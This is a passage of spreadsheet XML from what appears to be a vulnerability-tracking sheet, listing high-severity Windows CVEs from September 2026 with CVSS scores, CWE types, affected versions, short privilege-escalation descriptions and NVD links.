      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68825</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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0" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q300" s="5" t="inlineStr"/>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S300" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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1" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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4" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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6" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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7" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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09" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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0" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
